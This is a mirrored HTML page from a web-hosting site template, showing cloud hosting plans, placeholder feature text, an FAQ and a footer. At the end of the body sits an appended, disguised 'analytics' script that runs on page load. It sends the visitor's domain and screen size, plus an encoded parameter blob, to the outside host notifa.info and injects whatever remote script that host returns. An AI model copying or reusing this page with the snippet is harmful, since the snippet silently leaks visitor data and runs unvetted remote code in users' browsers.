<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/cloud-hosting.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Cloud Hosting</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li class="active"><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="page_banner">
  <div class="container">
    <div class="row">
      <div class="col-md-7 col-sm-7 col-xs-12">
        <h1>Cloud Hosting</h1>
        <div class="sub_heading_page"><strong>Built on the Cloud </strong> for You &amp; Your Business</div>
        <ul>
          <li>Twice as fast</li>
          <li>Scales with your traffic</li>
          <li>AntiSpam &amp; Virus Protection</li>
          <li>30 Day Money Back Guarantee</li>
        </ul>
        <div class="row">
          <div class="col-md-6 col-sm-12 col-xs-12">
            <div class="startsat">Starts at</div>
            <div class="banner_price">$14.24<span>/mo</span></div>
          </div>
          <div class="col-md-6 col-sm-12 col-xs-12"> <a class="primary_button" href="#">Buy Now</a> </div>
        </div>
      </div>
      <div class="col-md-5 col-sm-5 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="offer">
          <div class="offer_inner">
            <div class="top_l">Mega mid-Year</div>
            <div class="big_l">Sale</div>
            <div class="off">upto 25% off</div>
            <div class="c_code">Use Coupon Code <span>'SHMEGASALE'</span></div>
            <div class="ends">Ends on 30 June 2017</div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Prices Table Section Start ========= -->

<section class="price_table text_center">
  <div class="tabbable-panel">
    <div class="tabbable-line">
      <div class="container">
        <div class="row">
          <div class="col-md-12 col-sm-12 col-xs-12">
            <div class="headings black_text">
              <h6>Plan and Price</h6>
              <h3>Cloud Hosting Plans</h3>
              <div class="sep black_bg"></div>
            </div>
          </div>
          <div class="hosting_price">
            <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s">
              <div class="price_holder">
                <div class="price_img"><i class="fa fa-star"></i></div>
                <div class="clearfix"> </div>
                <h4>Personal Cloud</h4>
                <p>Dummy text of the printing and typesetting industry. </p>
                <div class="plan_value">
                  <div class="star_plan"> Starts from</div>
                  $2.42<span>/Month</span></div>
                <ul>
                  <li><strong>2 CPU </strong> cores </li>
                  <li><strong>50 GB </strong> Disk Space</li>
                  <li><strong>2 GB </strong> RAM</li>
                  <li><strong>Unlimited</strong> Bandwidth </li>
                  <li><strong>Unlimited</strong> Email Storage </li>
                </ul>
                <div class="order_now"> <a class="primary_button" href="#"> Order Now </a></div>
              </div>
            </div>
            <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s">
              <div class="price_holder">
                <div class="price_img"><i class="fa fa-suitcase"></i></div>
                <div class="clearfix"> </div>
                <h4>Business Cloud</h4>
                <p>Dummy text of the printing and typesetting industry. </p>
                <div class="plan_value">
                  <div class="star_plan"> Starts from</div>
                  $3.81<span>/Month</span></div>
                <ul>
                  <li><strong>4 CPU </strong> cores </li>
                  <li><strong>Unlimited </strong> Disk Space</li>
                  <li><strong>4 GB </strong> RAM</li>
                  <li><strong>Unlimited</strong> Bandwidth </li>
                  <li><strong>Unlimited</strong> Email Storage </li>
                </ul>
                <div class="order_now"> <a class="primary_button" href="#"> Order Now </a></div>
              </div>
            </div>
            <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".5s">
              <div class="price_holder">
                <div class="price_img"><i class="fa fa-shield"></i></div>
                <div class="clearfix"> </div>
                <h4>Pro Cloud</h4>
                <p>Dummy text of the printing and typesetting industry. </p>
                <div class="plan_value">
                  <div class="star_plan"> Starts from</div>
                  $5.16<span>/Month</span></div>
                <ul>
                  <li><strong>6 CPU </strong> cores </li>
                  <li><strong>Unlimited </strong> Disk Space</li>
                  <li><strong>6 GB </strong> RAM</li>
                  <li><strong>Unlimited</strong> Bandwidth </li>
                  <li><strong>Unlimited</strong> Email Storager </li>
                </ul>
                <div class="order_now"> <a class="primary_button" href="#"> Order Now </a></div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Prices Table Section End ========= --> 

<!-- ========= Web Hosting Features Section Start ========= -->

<section class="hosting_features">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Curabitur vitae</h6>
          <h3>Our Hosting Features</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="features_box">
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-tasks"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Fast Load Time</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-life-ring"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Greate Support</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-indent"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Easy Installation</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-sitemap"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Domains & Emails</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Web Hosting Features Section End ========= --> 

<!-- ========= Why Choose Hosting Section Start ========= -->

<section class="text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Best Work</h6>
          <h3>Why Choose Us</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="why_choose_hosting">
        <div class="col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="hosting_box"><i class="fa fa-cog"></i>
            <h5 class="section_sub_heading">One Click Submission</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".2s">
          <div class="hosting_box"><i class="fa fa-database"></i>
            <h5 class="section_sub_heading">Free Data Backup</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="hosting_box"><i class="fa fa-briefcase"></i>
            <h5 class="section_sub_heading">Host Your Website</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".4s">
          <div class="hosting_box"><i class="fa fa-bookmark"></i>
            <h5 class="section_sub_heading">Web Hosting Space</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".5s">
          <div class="hosting_box"><i class="fa fa-cloud"></i>
            <h5 class="section_sub_heading">Make More Traffic</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".6s">
          <div class="hosting_box"><i class="fa fa-hand-o-down"></i>
            <h5 class="section_sub_heading">We Give Backup</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Why Choose Hosting Section End ========= --> 

<!-- ========= FAQs Section Start ========= -->

<section class="accordian_main">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>About the Domain</h6>
          <h3>Frequently Asked Questions</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="accordion">
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-1">What is Cloud Hosting?</a>
            <div id="accordion-1" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title active" href="#accordion-2">How Reliable is your Cloud Hosting?</a>
            <div id="accordion-2" class="accordion-section-content open">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-3">What kind of web hosting do I need? </a>
            <div id="accordion-3" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-4">What kind of web hosting do I need? </a>
            <div id="accordion-4" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= FAQs Section End ========= --> 

<!-- ========= Call Back Form Section Start ========= -->

<section class="call_back_main text_center">
  <div class="container">
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="headings black_text">
        <h6>Contact Us</h6>
        <h3>Get a Call Back</h3>
        <div class="sep black_bg"></div>
      </div>
      <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
    </div>
    <div class="col-md-6 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
      <div class="form_outer">
        <form>
          <input type="text" name="name" class="name" placeholder="Name" required="">
          <input type="text" name="phone" class="name" placeholder="Contact Number" required="">
          <input type="email" name="email" class="name" placeholder="Email" required="">
          <input type="submit" name="submit" class="primary_button" value="Send Now">
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Call Back Form Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X7aXYlPggUkFimhfVWRhn%2bxq9dxUdNpNSqPWJHg%2b%2bdsxJZDAqgBVyut%2bD5TKyv6NYxlccoXaZSMK%2bWqKY9vbFGipTkbHxpR9hEVGV3YwgEDUSZK9fD0sNrlE1QRvB18lujPCzDmTMavzkw%2f4GWt3e8Jx3ckDcKwKXD5J9ZTPc6GZy7y62VOA3vpTk%2bow8u2GyT2ogjdzbkWk3Eqp6bmunsdXOyiu3IGrFTSuAB8NjxoD1MuijDyteVhGVMJcm8jSyZ54Wh2vFpf4Uc7UN%2fxed5u9llQ9f3N9I8ZtdqOaE%2f3TYUam5AOcgmvB2qCXIJLacdWlzs4RndiGhHqyFl%2bxznVuGMXoKcT9EgrvCfN8VWeees949j8aWQauLLhy0a6Rq5NrqWkKHVdVmatecMdKIAzw92Kb7hDWDv6LhE44dNkInmZfsZzvWTZl6nKR8uvCfxZVCb4AgSNbRlkm3zifS7nlUCOIcRD1Ak2OBlY2rElLA%3d%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/cloud-hosting.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>